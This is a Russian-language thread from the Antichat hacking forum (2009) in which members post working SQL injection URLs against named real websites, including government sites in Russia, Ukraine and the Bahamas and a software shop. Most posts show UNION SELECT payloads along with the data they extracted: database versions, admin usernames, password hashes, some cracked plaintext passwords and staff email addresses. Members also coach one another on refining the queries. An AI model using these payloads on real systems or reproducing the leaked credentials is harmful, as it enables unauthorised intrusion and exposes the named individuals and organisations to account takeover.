ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7291  
Старый 01.01.2009, 17:31
Аватар для Xcontrol212
Xcontrol212
Постоянный
Регистрация: 13.02.2008
Сообщений: 505
Провел на форуме:
2916750

Репутация: 277


Отправить сообщение для Xcontrol212 с помощью ICQ
По умолчанию

Код:
http://anewpark.ca/parkupdate.php?id=-1+union+select+1,2,pass,4,5+FROM+auth/*
Код:
http://anewpark.ca/parkupdate.php?id=-1+union+select+1,2,user,4,5+FROM+auth/*
cmv ;XXViwWKTqWaWM
 
Ответить с цитированием

  #7292  
Старый 01.01.2009, 20:30
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Прокуратура Чувашской Республики:
Код:
http://www.chuvprok.gov.ru/news.php?id=-157+union+select+1,concat_ws(version(),user(),database()),3,4,5--
Юзер/версия/бд:
Код:
prokuratura@localhost4.0.17-ntprokuratura
Увы поиметь админский ак не удалось, ибо не подобрал таблицу с юзерами(((
-----------------------------------------------------------
The End!
 
Ответить с цитированием

  #7293  
Старый 01.01.2009, 21:48
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Есче один правительственный ресурс:
Код:
http://www.voladm.gov.ua/news.php?id=-4196+union+select+1,2,3,4,5,concat_ws(0x3a,table_schema,table_name,column_name),7,8,9,10,11,12,13,14+from+information_schema.columns+limit+1098,1--&today=&lang=ukr
Так же не докрутил, ибо в падлу перебирать 1098 таблиц(((
Так что только:
Код:
http://www.voladm.gov.ua/news.php?id=-4196+union+select+1,2,3,4,5,concat_ws(version(),user(),database()),7,8,9,10,11,12,13,14--&today=&lang=ukr
версия/юзер/бд:
Код:
obladmin_2@localhost5.1.26-rcvoladm_gov
 
Ответить с цитированием

  #7294  
Старый 01.01.2009, 22:11
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Более удачный хак:
Public Utilities Commission
Код:
http://www.pucbahamas.gov.bs/news.php?id=-82+union+select+1,2,3,4,concat_ws(0x3a,name,password),6,7,8,9,10,11,12,13+from+admin--&type=news&action=display
Логин/пасс:
Код:
Karen Rigby:3e6f2290ee4e701055be72757a545880
Код:
Lisa Bellot:2664085da4a728c6720f488de1f98b6b
Код:
Kemp:3c195b52a144b6acc18488fcd9db1d40
Код:
Whitfield:e705f73a79b4dcad2aed164ff79d91e9
---------------------------------------------------------------
 
Ответить с цитированием

  #7295  
Старый 01.01.2009, 22:59
Аватар для Wrath
Wrath
Познающий
Регистрация: 31.12.2008
Сообщений: 64
Провел на форуме:
356003

Репутация: 97
Отправить сообщение для Wrath с помощью ICQ
По умолчанию

Код:
http://www.prokredo.ru/college.php?id=-21+union+select+1,password,login,4,5,6,7,8,9,10,11,12,13,14+from+kredo_admins
n:mooncat
p:sql
 
Ответить с цитированием

  #7296  
Старый 01.01.2009, 23:21
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

"Бизнес-портал о реальном секторе экономики"

Код:
http://ugmk.info/?art=1230566216[sql]
5-ая ветка.

Цитата:
Сообщение от -m0rgan-  
Так же не докрутил, ибо в падлу перебирать 1098 таблиц(((
Код:
http://www.voladm.gov.ua/news.php?id=-4196+union+select+1,2,3,4,5,group_concat(table_schema,0x3a,table_name),7,8,9,10,11,12,13,14+from+information_schema.columns+where+column_name=0x6c6f67696e--
ЗЫ: Посты можно редактировать.
 
Ответить с цитированием

  #7297  
Старый 01.01.2009, 23:53
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Магазин проги для создания музыки Довольно хорошая прога в базе серийники итд в общем всё красиво..

http://www.fxpansion.com/index.php?page=42+union+select+concat_ws(0x3a3a,ve rsion(),user(),database())--

Database Version: 5.0.67-log
Database name: amulet_fxp
User name: amulet_5@209.68.4.60

Getting Data from table admin (20 Rows) from database amulet_fxp
Fields id:nameasswd:email

[1]:5:FxAdmin:6db2c691d93ff83982ca1cddcad249bd:andrea s@fxpansion.com
[2]:7:angus:ad9f3b061bc2814cfe7b3396ef579290:angus@fx pansion.com
[3]:8:skot:49043fd7063a5c3797c3f8b799f8c417:skot@fxpa nsion.com
[4]:9:rhiannon:8ec6dbb2bb58ef90bec34b32f700416c:rhian non@fxpansion.com password:felicity
[5]:11:steve:ecee098cb8e78f5aba61f8bf15fcc8e9:steve@f xpansion.com
[6]:27:julia:c2e285cb33cecdbeb83d2189e983a8c0:julia@f xpansion.com pass:julia
[7]:13:mayur:ff65543ed4d0eeb56155c32596607d0a:mm@fxpa nsion.com
[8]:14aul:facd4bc86b7f12740c83bcaa4e75ae0aaul@fxp ansion.com pass:exponent
[9]:15:drew:edc7b78aa1f15e32e473fe58a551cff5:drew@fxp ansion.com
[10]:16:rory:3c72a3b545abc540a09dd8a9d2949975:rory@fxp ansion.com
[11]:17:mully:03182bd6abc890c03027da69ba599d40:mully@f xpansion.com
[12]:18:robert:1806b29558477d521373c0d47675f175:robert @fxpansion.com
[13]:19:andy:10951f38de98894210cf39ee037bf5e9:andy@fxp ansion.com
[14]:20:ryan:365c2d3ed6ddc375841db8402bccc0ee:ryan@fxp ansion.com
[15]:24:rus:a9cb4024aedea7770c82b51cd0c452e4:rus@fxpan sion.com
[16]:22eter:fff66a4d00c8ed7bb7814ff29d0faca2eter@f xpansion.com pass:ambient
[17]:23:tom:e0f60286791b829d69fcf44c13aa5b15:tom@fxpan sion.com
[18]:25:clare:fd99fefa10ecdc781cf8016cb5381f0c:clare@f xpansion.com pass:marmite
[19]:29:terry:211be8df297928faeedd89e3a4f1a75a:terry@f xpansion.com
 
Ответить с цитированием

  #7298  
Старый 02.01.2009, 00:12
Аватар для Wrath
Wrath
Познающий
Регистрация: 31.12.2008
Сообщений: 64
Провел на форуме:
356003

Репутация: 97
Отправить сообщение для Wrath с помощью ICQ
По умолчанию

Palm Online


Код:
http://www.palmq.ru/article.php?sid=-1386+union+select+1,2,3,version(),user(),6,7,8,9,10,11%20--
Имя таблицы мне узнать удалось - nuke_users

Код:
http://www.palmq.ru/article.php?sid=-1386+union+select+1,2,3,4,5,table_name,7,8,9,10,11+from+information_schema.tables+limit+72,1%20--
Но почему-то столбцы узнать не получается.. Может я не правильно составляю запрос?

Код:
http://www.palmq.ru/article.php?sid=-1386+union+select+1,2,3,4,5,column_name,7,8,9,10,11+from+information_schema.columns+where+table_name='nuke_users'+limit+1,1%20--
 
Ответить с цитированием

  #7299  
Старый 02.01.2009, 00:26
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Но почему-то столбцы узнать не получается.. Может я не правильно составляю запрос?
Всё правильно, вот только nuke_users нужно зашифровать в hex.

Вот так:

Код:
http://www.palmq.ru/article.php?sid=-1386+union+select+1,2,3,4,5,column_name,7,8,9,10,11+from+information_schema.columns+where+table_name=0x6e756b655f7573657273+limit+1,1--
 
Ответить с цитированием

  #7300  
Старый 02.01.2009, 00:42
Аватар для bons
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

www.wwrn.org, PR = 5

Код:
http://www.wwrn.org/article.php?idd=-1+union+select+1,2,3,4,5--
http://www.wwrn.org/article.php?idd=-1+union+select+1,2,concat(version(),':',database(),':',user()),4,5--
version() - 5.1.26-rc
database() - wwrn
user() - wwrn@localhost

www.writersstore.com, PR = 5

Код:
http://www.writersstore.com/article.php?articles_id=604'+limit+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+0
http://www.writersstore.com/article.php?articles_id=604'+limit+0+union+select+1,2,concat(version(),':',database(),':',user()),4,5,6,7,8,9,10,11,12,13,14,15--+0
version() - 4.0.17-log
database() - tws_store
user() - tws@216.92.131.39
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ